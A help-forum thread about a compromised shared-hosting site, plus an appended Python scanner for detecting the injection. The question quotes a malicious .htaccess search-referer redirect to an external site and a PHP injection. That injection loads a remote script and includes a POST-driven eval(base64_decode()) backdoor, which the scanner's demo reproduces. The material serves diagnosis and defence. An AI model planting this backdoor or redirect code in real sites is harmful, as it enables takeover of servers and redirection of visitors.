
I have a website hosted with Dreamhost and the contents of my .htaccess file are being compromised over and over again. Someone is putting stuff like this at the front of my code:

    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
    RewriteRule ^(.*)$ http://float-answer.ru/access/index.php

The chmod of the file is 744. From the last modified time of the file I can estimate when the attack happened.

Nothing else on the site seems to have been attacked.

I have already changed all relevant passwords.

Edit: it seems worse! Several PHP files have been injected with this piece of code:

    global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
clamp
  • possible duplicate of [My server's been hacked EMERGENCY](http://serverfault.com/questions/218005/my-servers-been-hacked-emergency) – Shane Madden Jan 04 '12 at 19:47

1 Answer


The chmod 744 means that your htaccess is accessible to whomever owns the file. Is that file owned by www-data? If so, I'd suspect your own PHP code is being used to compromise the data. Changing your passwords will not help you if your sshd or other things have been trojaned. Do you own this server? (or is it hosted, virtual or leased?) What distro are you using? (I assume it is Linux)

mcr
  • Thanks! Distro is Debian. Hosting is shared. Owner is not www-data but my user. – clamp Jan 04 '12 at 15:53
  • Notify Dreamhost's support department since this is a shared server and they will be better able to determine when and where the breach came from and also fix it. – daemonofchaos Jan 04 '12 at 16:24
  • Already contacted their support, but still waiting for a response. – clamp Jan 04 '12 at 16:41
  • If it is shared hosting, then the PHP likely runs as your user, so I would still suspect your PHP code is the hole. – mcr Jan 20 '12 at 16:19
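The question shows two injection shapes (a referer-conditional RewriteRule in .htaccess that redirects search-engine visitors to an external site, and a PHP fragment ending in an eval of a base64 payload taken from $_POST), and the answer's follow-up points out that on shared hosting PHP runs as the site owner's user, so file ownership alone does not protect the files. The scanner below is an added example and is not code from the question, the answer or Dreamhost: it walks a web root, flags .htaccess and .php files containing those indicator patterns, and records each file's mode and ownership so the two things can be triaged together. The web root, the malicious.example URL and the cut-down rewrite rule are constructed for the demo. Legitimate hotlink-protection rules also use HTTP_REFERER, so a hit is a lead for manual review, not proof of compromise on its own.

```python
"""Triage scanner for the .htaccess / PHP injection patterns quoted above.

Added example (not the question's, the answer's or Dreamhost's code).
"""
import os
import re
import stat
import tempfile
from pathlib import Path

# Indicator patterns derived from the injected code shown in the question.
INDICATORS = {
    # .htaccess: RewriteCond on the referer followed by a RewriteRule to an external URL
    "htaccess_referer_redirect": re.compile(
        r"RewriteCond\s+%\{HTTP_REFERER\}[^\n]*\n\s*RewriteRule[^\n]*\shttps?://", re.I),
    # PHP: eval of a base64-decoded payload
    "php_eval_base64": re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I),
    # PHP: eval whose input comes from a POST parameter
    "php_post_eval": re.compile(r"eval\s*\([^;]*\$_POST\[", re.I),
    # PHP: injected <script src=...> built from a PHP variable
    "php_remote_script": re.compile(r"<script src='\$\w+'>", re.I),
}


def scan_file(path):
    """Return the names of all indicators found in one file (empty list if clean)."""
    try:
        text = Path(path).read_text(errors="replace")
    except OSError:
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def scan_tree(root, since=None):
    """Scan .htaccess and *.php files under root.

    Returns {relative_path: info} for every file that matched an indicator or,
    if `since` (epoch seconds) is given, was modified at or after that time.
    info records mode, whether group/other can write, and the owning uid so
    that "is the web server writing as my user?" can be checked alongside.
    """
    my_uid = getattr(os, "getuid", lambda: -1)()
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn != ".htaccess" and not fn.endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            st = os.stat(path)
            hits = scan_file(path)
            recent = since is not None and st.st_mtime >= since
            if hits or recent:
                findings[os.path.relpath(path, root)] = {
                    "indicators": hits,
                    "mode": oct(stat.S_IMODE(st.st_mode)),
                    "group_or_world_writable": bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)),
                    "owned_by_me": st.st_uid == my_uid,
                    "recently_modified": recent,
                }
    return findings


def build_sample_webroot():
    """Constructed sample web root: one injected .htaccess, one injected PHP file, one clean file."""
    root = tempfile.mkdtemp(prefix="webroot_")
    Path(root, ".htaccess").write_text(
        "RewriteEngine On\n"
        "RewriteCond %{HTTP_REFERER} ^.*(google|bing|yahoo)\\.(.*)\n"
        "RewriteRule ^(.*)$ http://malicious.example/access/index.php\n")  # constructed URL
    Path(root, "index.php").write_text(
        "<?php\n"
        "$sessdt_u = 'http://malicious.example/?rnd=1';\n"  # constructed URL
        "echo \"<script src='$sessdt_u'></script>\";\n"
        "$sessdt_p = \"showimg\";\n"
        "if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;}\n")
    Path(root, "clean.php").write_text("<?php\necho 'hello world';\n")
    os.chmod(Path(root, "index.php"), 0o744)  # same mode as reported in the question
    return root


if __name__ == "__main__":
    webroot = build_sample_webroot()
    for rel, info in sorted(scan_tree(webroot).items()):
        print(f"{rel}: {info}")
```

Running it on a real site would be `scan_tree("/home/user/example.com", since=<epoch of last known-good backup>)`; the `recently_modified` flag then catches files the regexes miss, which matters because the injected PHP in the question is easy to re-obfuscate. Files flagged `owned_by_me` with PHP running as that same user are exactly the case mcr describes: any writable file in the tree can be rewritten by a hole in the site's own PHP.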